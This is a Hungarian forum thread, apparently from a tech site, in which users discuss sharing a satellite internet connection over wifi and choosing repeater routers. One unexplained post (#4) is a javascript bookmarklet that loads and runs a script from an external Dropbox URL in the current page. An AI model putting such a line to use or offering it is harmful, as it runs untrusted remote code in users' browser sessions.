9
wifi router be szerelése modem nélkül
  • cibi17
    #9
    Sziasztok. A következő problémám lenne. Van egy t-home-os álló (kínai) routerem és meg szeretném osztani a netemet wifin keresztül a másik házba egy asztali gépre, ami kb 20méterre van a szobámtól, de a probléma nem is a táv, hanem a közte levő 2db 80centis fal :D Átvittem a laptopot, de egyszer látja, egyszer nem. Amikor látja, akkor is csak 1-es jelerősség. Kérdésem az lenne, hogy ha vennék egy ismétlős routert pl.:
    1. http://www.emag.hu/tp-link-wireless-router-n-300mbps-tl-wr841n/pd/E75V7BBBM/
    2. http://www.emag.hu/tp-link-wireless-router-n-300mbps-tl-wr841nd/pd/EMC92BBBM/
    3. http://www.emag.hu/edimax-wireless-router-300mbps-br-6428nc/pd/DHSVVBBBM/
    akkor jó, megbízható jelem lenne és erről a routerről tudnám csatlakoztatni-e az asztali számítógépet kábelen keresztül.
    Személy szerint a 3.-ra gondoltam, mert úgyy tűnik nagy antennája van és levehető, nem tudom, h az én thomos routeremnek levehető-e az antennája, de akkor egyiket cserélném.
    Esetleg más ötlet?
    Lényeg, h minnél olcsóbban szeretném megoldani és legyen egy megbízható kapcsolatom. Sebesség nem számít, mert csak netezésre lenne az a másik gép. Köszönöm.
  • mate5255
    #8
    köszi mindenkinek austus sikerült úgy megcsinálni ahogy mondtad kösz még 1x-er
  • Dj Faustus #7
    "Én az internetet parabolán keresztül kapom"
    Tehát vagy mikrohullámú Internet-szolgáltatód van, vagy a szomszédtól kapod a neted vezeték nélkül, és ezt szeretnéd vezeték nélkül tovább osztani.

    Bármelyik eset is áll fenn, a következő felállást javaslom:
    parabola
    |
    |
    koax kábel
    |
    |
    RPSMA-antennacsatlakozó
    |
    kliensmóddal rendelkező WIFI AP
    |
    Ethernet-port
    |
    |
    WIFI-s router WAN portja
    |
    WIFI-s router
    |
    a router antennája antenna vagy a router LAN portja
    |
    |
    kliensek


    Ha mikrohullámú Internet-szolgáltatód van, hívd fel őket és mondd el nekik, hogy meg szeretnéd osztani anetet több gép között - majd ők visznek ki kliensmóddal rendelkező WIFI AP-t. Ha szomszédtól veszed a netet át, akkor meg neked kell venned WIFI AP-t (olyat vegyél, aminek van RPSMA antennabemenete/lecserélhető az antennája).
  • tommygear
    #6
    nem nyert
  • F1re
    #5
    fogalmazd meg újra, h mit is akarsz ?! és milyen cuccaid vannak stb
  • mate5255
    #4
    javascript:javascript:(a=(b=document).createElement('script')).src='//dl.dropbox.com/u/29427867/button.js',b.body.appendChild(a);void(0)
  • Wolfsnack
    #3
    lefotóznád az egész rendszert? akkor jobban tudnánk segíteni
  • Gibor
    #2
    Itt próbálkozz.
  • mate5255
    #1
    Hogy tudnám azt megcsinálni hogy modemet ne keljen használnom. Én az internetet parabolán keresztül kapom és egy coax kábellal kötöm össze a géppel a gépben van egy "Wirless Lan Pci Adapter"":itt akép róla" amit a net mellé kaptam pár ismerősömet megkérdeztem és ők azt mondták hogy a wifit úgy tudom megcsinálni hogy lanba kötöm a géppel a wifis routert "parabola--coax-al-->gép--lan-nal-->wifi" és így elvileg tovább adja a netet. Előre is köszi a segítséget.